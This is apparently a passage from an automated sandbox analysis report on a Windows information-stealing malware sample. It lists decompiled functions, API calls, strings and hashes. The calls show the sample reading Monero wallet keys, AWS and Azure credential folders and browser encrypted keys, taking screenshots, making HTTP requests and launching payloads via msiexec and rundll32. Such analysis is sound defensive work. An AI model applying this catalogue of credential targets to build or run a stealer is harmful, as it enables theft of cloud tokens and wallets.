                          • Instruction Fuzzy Hash: 86E16D75950108ABCB04FBE1DD96EEE7379AF14304F10015EF106B60A1DE38AA5ACB6A
                          Function 0040C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                            • Part of subcall function 0041A920: lstrcat.KERNEL32(00000000), ref: 0041A982
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0128CC18,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                          • StrStrA.SHLWAPI(?,0128CC60,00420B52), ref: 0040CAF7
                          • StrStrA.SHLWAPI(00000000,0128CCF0), ref: 0040CB1E
                          • StrStrA.SHLWAPI(?,0128D2B8,00000000,?,00421458,00000000,?,00000000,00000000,?,01288800,00000000,?,00421454,00000000,?), ref: 0040CCA2
                          • StrStrA.SHLWAPI(00000000,0128D138), ref: 0040CCB9
                            • Part of subcall function 0040C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0040C871
                            • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                          • StrStrA.SHLWAPI(?,0128D138,00000000,?,0042145C,00000000,?,00000000,012889A0), ref: 0040CD5A
                          • StrStrA.SHLWAPI(00000000,01288AB0), ref: 0040CD71
                            • Part of subcall function 0040C820: lstrcat.KERNEL32(?,00420B46), ref: 0040C943
                            • Part of subcall function 0040C820: lstrcat.KERNEL32(?,00420B47), ref: 0040C957
                            • Part of subcall function 0040C820: lstrcat.KERNEL32(?,00420B4E), ref: 0040C978
                          • lstrlen.KERNEL32(00000000), ref: 0040CE44
                          • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: 2c97f0b674b0cc64eb51e3fcc7201f9f211e9e8e2facb3b8abbaeb1f8af4947d
                          • Instruction ID: ce47a47c009d6352eb47f886e70e5edaf148b34d9121e4636baaed8884c7f2c1
                          • Opcode Fuzzy Hash: 2c97f0b674b0cc64eb51e3fcc7201f9f211e9e8e2facb3b8abbaeb1f8af4947d
                          • Instruction Fuzzy Hash: 20E14F71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                          Function 00418320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • RegOpenKeyExA.ADVAPI32(00000000,0128AC60,00000000,00020019,00000000,004205B6), ref: 004183A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                          • wsprintfA.USER32 ref: 00418459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: d992ae31c4370ba79398660ceb908c9469638050511d1de5a8af4af9992bc93a
                          • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                          • Opcode Fuzzy Hash: d992ae31c4370ba79398660ceb908c9469638050511d1de5a8af4af9992bc93a
                          • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                          Function 00414D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00418E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00414DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00414DCD
                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                            • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                          • lstrcat.KERNEL32(?,00000000), ref: 00414E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00414E59
                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                            • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                            • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00414EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                            • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                            • Part of subcall function 00414910: lstrcat.KERNEL32(?,0128E4D0), ref: 00414A4A
                            • Part of subcall function 00414910: lstrcat.KERNEL32(?,00420FF8), ref: 00414A5C
                            • Part of subcall function 00414910: lstrcat.KERNEL32(?,?), ref: 00414A70
                            • Part of subcall function 00414910: lstrcat.KERNEL32(?,00420FFC), ref: 00414A82
                            • Part of subcall function 00414910: lstrcat.KERNEL32(?,?), ref: 00414A96
                            • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                            • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: c4fa5dcb2bb5c3f06c8bfa91412fb491c8c97473736fbedb0e4db38ccd7ee9ad
                          • Instruction ID: f000d6c2f448f24832ff43dfc45437f0696cf75d8826a8fca75761153c99f472
                          • Opcode Fuzzy Hash: c4fa5dcb2bb5c3f06c8bfa91412fb491c8c97473736fbedb0e4db38ccd7ee9ad
                          • Instruction Fuzzy Hash: C14186BDA4021467D710F7B0EC47FED7338AB64704F404559B645660C2EEB85BC9CB96
                          Function 00419010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                          • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                          • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                          • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                          Function 00412E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                          • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                          • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExecuteShell$lstrcpy
                          • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                          • API String ID: 2507796910-3625054190
                          • Opcode ID: c328cdc9be81c501a06adb078cc21fd2a777e696e09ee326a75be493aa109de0
                          • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                          • Opcode Fuzzy Hash: c328cdc9be81c501a06adb078cc21fd2a777e696e09ee326a75be493aa109de0
                          • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                          Function 004152C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                            • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                            • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0128E5E0), ref: 00406303
                            • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                            • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0128DBB0,00000000,00000000,00400100,00000000), ref: 00406385
                            • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                            • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                          • lstrlen.KERNEL32(00000000), ref: 0041532F
                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                          • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                          • lstrlen.KERNEL32(00000000), ref: 00415383
                          • lstrlen.KERNEL32(00000000), ref: 004153AE
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 3240024479-1526165396
                          • Opcode ID: a99532bd2d294eafc9623920962e268430e16fc8ae6a36dd000ff70ad9d5140d
                          • Instruction ID: 712b1efc5e9cffa6d85e25cc0d5ccfd3d928df1c32b3a809526078b9d49aab8c
                          • Opcode Fuzzy Hash: a99532bd2d294eafc9623920962e268430e16fc8ae6a36dd000ff70ad9d5140d
                          • Instruction Fuzzy Hash: 4F514130911108EBCB14FF61CD92AED3779AF50354F50401EF40A6B591DF386B96CB6A
                          Function 004112D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 7a02cffb099377d4201d2e9291f10bf61413159ad2e3b4e1484e42fc67f17588
                          • Instruction ID: 4a7073b5750037b12307d97dd43dd6b1cfcbfa6166e71f48df9e2dbc49e6d573
                          • Opcode Fuzzy Hash: 7a02cffb099377d4201d2e9291f10bf61413159ad2e3b4e1484e42fc67f17588
                          • Instruction Fuzzy Hash: D0C1D7B5941208ABCB14EF60DC89FEA7379BF54304F0045DEF50A67241DA78AAC5CF95
                          Function 00414280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00418E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 004142EC
                          • lstrcat.KERNEL32(?,0128DC88), ref: 0041430B
                          • lstrcat.KERNEL32(?,?), ref: 0041431F
                          • lstrcat.KERNEL32(?,0128CB70), ref: 00414333
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00401B54,?,?,0042564C,?,?,00420E1F), ref: 00418D9F
                            • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,0040148F,00000000), ref: 00409A5A
                            • Part of subcall function 004099C0: LocalFree.KERNEL32(0040148F), ref: 00409A90
                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                            • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                          • StrStrA.SHLWAPI(?,0128DC28), ref: 004143F3
                          • GlobalFree.KERNEL32(?), ref: 00414512
                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                            • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                            • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                          • lstrcat.KERNEL32(?,00000000), ref: 004144A3
                          • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004144D2
                          • lstrcat.KERNEL32(00000000,?), ref: 004144E5
                          • lstrcat.KERNEL32(00000000,00420FB8), ref: 004144F4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                          • String ID:
                          • API String ID: 3541710228-0
                          • Opcode ID: d620b140cba4f846db9659000884d6f99d6e686b8edb28011cd315dfa72b518a
                          • Instruction ID: db4b38d3214fd49b51c6fefb648249eaa571636795fccd23eedf93bd9b9a74f9
                          • Opcode Fuzzy Hash: d620b140cba4f846db9659000884d6f99d6e686b8edb28011cd315dfa72b518a
                          • Instruction Fuzzy Hash: 897156B6910208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                          Function 00401310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
